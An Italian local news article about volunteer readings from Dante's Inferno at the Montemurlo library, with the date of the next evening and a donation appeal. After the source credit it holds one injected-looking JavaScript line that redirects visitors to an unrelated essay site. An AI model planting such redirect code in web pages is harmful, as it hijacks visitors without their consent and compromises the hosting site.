A MONTEMURLO PIACCIONO LE “LETTURE DANTESCHE”

I lettori volontari di Dante
I lettori volontari di Dante

MONTEMURLO. Successo per la prima serata di letture dantesche, che si è svolta ieri sera nella corte della biblioteca comunale “Bartolomeo Della Fonte” in Villa Giamari.

Una cinquantina le persone che hanno partecipato all’incontro promosso dalla biblioteca in occasione dei 750 anni dalla nascita del Sommo Poeta. A leggere i tre canti dell’Inferno (il primo, il terzo e il quinto) i volontari reclutati tra gli utenti della biblioteca.

“Una bella occasione per riscoprire l’opera più importante della letteratura italiana ed apprezzarne la poesia e l’attualità – sottolinea l’assessore alla cultura, Giuseppe Forastiero, che ha introdotto la serata con la lettura di un brano tratto dalla “Storia di Montemurlo” di Anacleto Francisci –. Giovedì prossimo continueremo le letture spostandoci nel suggestivo contesto del borgo della Rocca”.

Michael Paperetti legge l’Inferno
Michael Paperetti legge l’Inferno

L’appuntamento, infatti, è per giovedì 23 luglio alle ore 21,15 nell’oratorio del Corpus Domini della pieve di San Giovanni Decollato alla Rocca.

Davanti al leggio si alterneranno altri dieci lettori volontari che leggeranno altri canti dell’Inferno: il sesto dove Dante incontra Cerbero e i golosi, il ventiseiesimo con Ulisse, il trentatreesimo dove si trova il conte Ugolino, fino ad arrivare alla Caina, il luogo del male più profondo dove risiede Lucifero.

Ogni lettura è accompagnata da una breve spiegazione introduttiva e da un video che racconta per immagini i vari canti della Divina Commedia. L’ingresso alle serate è libero e gratuito. Per maggiori informazioni si può contattare la biblioteca “B. Della Fonte” tel. 0574558577.

[masi – comune montemurlo]
window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT08V0306913833100000001431 su CariPt di Porta San Marco-Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

Lascia un commento